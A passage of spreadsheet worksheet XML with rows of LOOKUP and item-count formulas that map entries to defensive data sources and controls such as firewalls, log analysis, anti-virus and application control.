      <c r="B197" s="45" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C197" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D197" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E197" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F197" s="50"/>
      <c r="G197" s="19"/>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A198" s="16" t="s">
        <v>321</v>
      </c>
      <c r="B198" s="45" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:H)</f>
        <v>Firewall,Host forensic analysis</v>
      </c>
      <c r="C198" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D198" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E198" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F198" s="50"/>
      <c r="G198" s="19"/>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A199" s="16" t="s">
        <v>322</v>
      </c>
      <c r="B199" s="45" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:H)</f>
        <v>Firewall,Host forensic analysis</v>
      </c>
      <c r="C199" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D199" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E199" s="45">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F199" s="50"/>
      <c r="G199" s="19"/>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A200" s="16" t="s">
        <v>323</v>
      </c>
      <c r="B200" s="45" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C200" s="17">
        <v>0</v>
      </c>
      <c r="D200" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E200" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F200" s="50"/>
      <c r="G200" s="19"/>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A201" s="16" t="s">
        <v>324</v>
      </c>
      <c r="B201" s="45" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C201" s="17">
        <v>0</v>
      </c>
      <c r="D201" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E201" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F201" s="50"/>
      <c r="G201" s="19"/>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="16" t="s">
        <v>325</v>
      </c>
      <c r="B202" s="45" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C202" s="17">
        <v>0</v>
      </c>
      <c r="D202" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E202" s="45">
        <f t="shared" ref="E202:E265" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F202" s="50"/>
      <c r="G202" s="19"/>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A203" s="16" t="s">
        <v>326</v>
      </c>
      <c r="B203" s="45" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:H)</f>
        <v>Static File Analysis,Application control,Application control by file name or path</v>
      </c>
      <c r="C203" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D203" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E203" s="45">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F203" s="50"/>
      <c r="G203" s="19"/>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="16" t="s">
        <v>327</v>
      </c>
      <c r="B204" s="45" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C204" s="17">
        <v>0</v>
      </c>
      <c r="D204" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E204" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F204" s="50"/>
      <c r="G204" s="19"/>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="16" t="s">
        <v>328</v>
      </c>
      <c r="B205" s="45" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C205" s="17">
        <v>0</v>
      </c>
      <c r="D205" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E205" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F205" s="50"/>
      <c r="G205" s="19"/>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A206" s="16" t="s">
        <v>329</v>
      </c>
      <c r="B206" s="45" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:H)</f>
        <v>Defensive network service scanning</v>
      </c>
      <c r="C206" s="17">
        <v>100</v>
      </c>
      <c r="D206" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E206" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F206" s="50"/>
      <c r="G206" s="19"/>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="16" t="s">
        <v>330</v>
      </c>
      <c r="B207" s="45" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C207" s="17">
        <v>0</v>
      </c>
      <c r="D207" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E207" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F207" s="50"/>
      <c r="G207" s="19"/>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A208" s="16" t="s">
        <v>331</v>
      </c>
      <c r="B208" s="45" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:H)</f>
        <v>Log analysis</v>
      </c>
      <c r="C208" s="17">
        <v>100</v>
      </c>
      <c r="D208" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E208" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F208" s="50"/>
      <c r="G208" s="19"/>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A209" s="16" t="s">
        <v>333</v>
      </c>
      <c r="B209" s="45" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:H)</f>
        <v>Log analysis</v>
      </c>
      <c r="C209" s="17">
        <v>0</v>
      </c>
      <c r="D209" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E209" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F209" s="50"/>
      <c r="G209" s="19"/>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A210" s="16" t="s">
        <v>334</v>
      </c>
      <c r="B210" s="45" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:H)</f>
        <v>Log analysis</v>
      </c>
      <c r="C210" s="17">
        <v>0</v>
      </c>
      <c r="D210" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E210" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F210" s="50"/>
      <c r="G210" s="19"/>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A211" s="16" t="s">
        <v>336</v>
      </c>
      <c r="B211" s="45" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C211" s="17">
        <v>0</v>
      </c>
      <c r="D211" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E211" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F211" s="50"/>
      <c r="G211" s="19"/>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="16" t="s">
        <v>337</v>
      </c>
      <c r="B212" s="45" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,System access controls</v>
      </c>
      <c r="C212" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D212" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E212" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F212" s="50"/>
      <c r="G212" s="19"/>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="16" t="s">
        <v>338</v>
      </c>
      <c r="B213" s="45" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C213" s="17">
        <v>0</v>
      </c>
      <c r="D213" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E213" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F213" s="50"/>
      <c r="G213" s="19"/>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A214" s="16" t="s">
        <v>339</v>
      </c>
      <c r="B214" s="45" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C214" s="17">
        <v>0</v>
      </c>
      <c r="D214" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E214" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F214" s="50"/>
      <c r="G214" s="19"/>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A215" s="16" t="s">
        <v>340</v>
      </c>
      <c r="B215" s="45" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C215" s="17">
        <v>0</v>
      </c>
      <c r="D215" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E215" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F215" s="50"/>
      <c r="G215" s="19"/>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A216" s="16" t="s">
        <v>341</v>
      </c>
      <c r="B216" s="45" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C216" s="17">
        <v>0</v>
      </c>
      <c r="D216" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E216" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F216" s="50"/>
      <c r="G216" s="19"/>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="16" t="s">
        <v>342</v>
      </c>
      <c r="B217" s="45" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:H)</f>
        <v>Application control,Digital Certificate Validation</v>
      </c>
      <c r="C217" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D217" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E217" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F217" s="50"/>
      <c r="G217" s="19"/>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A218" s="16" t="s">
        <v>343</v>
      </c>
      <c r="B218" s="45" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C218" s="17">
        <v>0</v>
      </c>
      <c r="D218" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E218" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F218" s="50"/>
      <c r="G218" s="19"/>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A219" s="16" t="s">
        <v>344</v>
      </c>
      <c r="B219" s="45" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Application control,Digital Certificate Validation</v>
      </c>
      <c r="C219" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D219" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E219" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F219" s="50"/>
      <c r="G219" s="19"/>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A220" s="16" t="s">
        <v>345</v>
      </c>
      <c r="B220" s="45" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C220" s="17">
        <v>0</v>
      </c>
      <c r="D220" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E220" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F220" s="50"/>
      <c r="G220" s="19"/>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="16" t="s">
        <v>346</v>
      </c>
      <c r="B221" s="45" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Application control,Digital Certificate Validation</v>
      </c>
      <c r="C221" s="17" t="s">
        <v>405</v>
      </c>
      <c r="D221" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E221" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F221" s="50"/>
      <c r="G221" s="19"/>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="16" t="s">
        <v>347</v>
      </c>
      <c r="B222" s="45" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:H)</f>
        <v>Static File Analysis</v>
      </c>
      <c r="C222" s="17">
        <v>100</v>
      </c>
      <c r="D222" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E222" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F222" s="50"/>
      <c r="G222" s="19"/>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="16" t="s">
        <v>348</v>
      </c>
      <c r="B223" s="45" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:H)</f>
        <v>File system access controls</v>
      </c>
      <c r="C223" s="17">
        <v>100</v>
      </c>
      <c r="D223" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E223" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F223" s="50"/>
      <c r="G223" s="19"/>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A224" s="16" t="s">
        <v>349</v>
      </c>
      <c r="B224" s="45" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C224" s="17">
        <v>100</v>
      </c>
      <c r="D224" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E224" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F224" s="50"/>
      <c r="G224" s="19"/>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A225" s="16" t="s">
        <v>350</v>
      </c>
      <c r="B225" s="45" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host forensic analysis,Signature-based detection,Static file analysis</v>
      </c>
      <c r="C225" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D225" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E225" s="45">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F225" s="50"/>
      <c r="G225" s="19"/>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="16" t="s">
        <v>351</v>
      </c>
      <c r="B226" s="45" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C226" s="17">
        <v>0</v>
      </c>
      <c r="D226" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E226" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F226" s="50"/>
      <c r="G226" s="19"/>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A227" s="16" t="s">
        <v>353</v>
      </c>
      <c r="B227" s="45" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C227" s="17">
        <v>0</v>
      </c>
      <c r="D227" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E227" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F227" s="50"/>
      <c r="G227" s="19"/>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A228" s="16" t="s">
        <v>355</v>
      </c>
      <c r="B228" s="45" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:H)</f>
        <v>System access controls,File system access controls</v>
      </c>
      <c r="C228" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D228" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E228" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F228" s="50"/>
      <c r="G228" s="19"/>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A229" s="16" t="s">
        <v>356</v>
      </c>
      <c r="B229" s="45" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C229" s="17">
        <v>0</v>
      </c>
      <c r="D229" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E229" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F229" s="50"/>
      <c r="G229" s="19"/>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A230" s="16" t="s">
        <v>357</v>
      </c>
      <c r="B230" s="45" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C230" s="17">
        <v>0</v>
      </c>
      <c r="D230" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E230" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F230" s="50"/>
      <c r="G230" s="19"/>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A231" s="16" t="s">
        <v>359</v>
      </c>
      <c r="B231" s="45" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C231" s="17">
        <v>0</v>
      </c>
      <c r="D231" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E231" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F231" s="50"/>
      <c r="G231" s="19"/>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A232" s="16" t="s">
        <v>360</v>
      </c>
      <c r="B232" s="45" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C232" s="17">
        <v>0</v>
      </c>
      <c r="D232" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E232" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F232" s="50"/>
      <c r="G232" s="19"/>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A233" s="16" t="s">
        <v>361</v>
      </c>
      <c r="B233" s="45" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C233" s="17">
        <v>0</v>
      </c>
      <c r="D233" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E233" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F233" s="50"/>
      <c r="G233" s="19"/>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A234" s="16" t="s">
        <v>362</v>
      </c>
      <c r="B234" s="45" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C234" s="17">
        <v>0</v>
      </c>
      <c r="D234" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E234" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F234" s="50"/>
      <c r="G234" s="19"/>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A235" s="16" t="s">
        <v>363</v>
      </c>
      <c r="B235" s="45" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C235" s="17">
        <v>0</v>
      </c>
      <c r="D235" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E235" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F235" s="50"/>
      <c r="G235" s="19"/>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A236" s="16" t="s">
        <v>364</v>
      </c>
      <c r="B236" s="45" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C236" s="17">
        <v>0</v>
      </c>
      <c r="D236" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E236" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F236" s="50"/>
      <c r="G236" s="19"/>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="16" t="s">
        <v>365</v>
      </c>
      <c r="B237" s="45" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C237" s="17">
        <v>0</v>
      </c>
      <c r="D237" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E237" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F237" s="50"/>
      <c r="G237" s="19"/>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="16" t="s">
        <v>366</v>
      </c>
      <c r="B238" s="45" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C238" s="17">
        <v>0</v>
      </c>
      <c r="D238" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E238" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F238" s="50"/>
      <c r="G238" s="19"/>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="16" t="s">
        <v>367</v>
      </c>
      <c r="B239" s="45" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C239" s="17">
        <v>0</v>
      </c>
      <c r="D239" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E239" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F239" s="50"/>
      <c r="G239" s="19"/>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A240" s="16" t="s">
        <v>368</v>
      </c>
      <c r="B240" s="45" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C240" s="17">
        <v>0</v>
      </c>
      <c r="D240" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E240" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F240" s="50"/>
      <c r="G240" s="19"/>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A241" s="16" t="s">
        <v>370</v>
      </c>
      <c r="B241" s="45" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host forensic analysis,Signature-based detection,Static File Analysis</v>
      </c>
      <c r="C241" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D241" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E241" s="45">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F241" s="50"/>
      <c r="G241" s="19"/>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A242" s="16" t="s">
        <v>371</v>
      </c>
      <c r="B242" s="45" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C242" s="17">
        <v>0</v>
      </c>
      <c r="D242" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E242" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F242" s="50"/>
      <c r="G242" s="19"/>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="16" t="s">
        <v>372</v>
      </c>
      <c r="B243" s="45" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C243" s="17">
        <v>0</v>
      </c>
      <c r="D243" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E243" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F243" s="50"/>
      <c r="G243" s="19"/>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="16" t="s">
        <v>374</v>
      </c>
      <c r="B244" s="45" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C244" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D244" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E244" s="45">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F244" s="50"/>
      <c r="G244" s="19"/>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="16" t="s">
        <v>375</v>
      </c>
      <c r="B245" s="45" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C245" s="17">
        <v>0</v>
      </c>
      <c r="D245" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E245" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F245" s="50"/>
      <c r="G245" s="19"/>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A246" s="43" t="s">
        <v>376</v>
      </c>
      <c r="B246" s="45" t="str">
        <f>LOOKUP(A246,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C246" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D246" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E246" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F246" s="50"/>
      <c r="G246" s="19"/>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A247" s="43" t="s">
        <v>377</v>
      </c>
      <c r="B247" s="45" t="str">
        <f>LOOKUP(A247,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C247" s="17">
        <v>0</v>
      </c>
      <c r="D247" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E247" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F247" s="50"/>
      <c r="G247" s="19"/>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A248" s="43" t="s">
        <v>378</v>
      </c>
      <c r="B248" s="45" t="str">
        <f>LOOKUP(A248,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C248" s="17">
        <v>0</v>
      </c>
      <c r="D248" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E248" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F248" s="50"/>
      <c r="G248" s="19"/>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A249" s="43" t="s">
        <v>379</v>
      </c>
      <c r="B249" s="45" t="str">
        <f>LOOKUP(A249,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C249" s="17">
        <v>0</v>
      </c>
      <c r="D249" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E249" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F249" s="50"/>
      <c r="G249" s="19"/>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A250" s="43" t="s">
        <v>380</v>
      </c>
      <c r="B250" s="45" t="str">
        <f>LOOKUP(A250,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C250" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D250" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E250" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F250" s="50"/>
      <c r="G250" s="19"/>
    </row>
    <row r="251" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A251" s="43" t="s">
        <v>381</v>
      </c>
      <c r="B251" s="45" t="str">
        <f>LOOKUP(A251,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C251" s="17">
        <v>0</v>
      </c>
      <c r="D251" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E251" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F251" s="50"/>
      <c r="G251" s="19"/>
    </row>
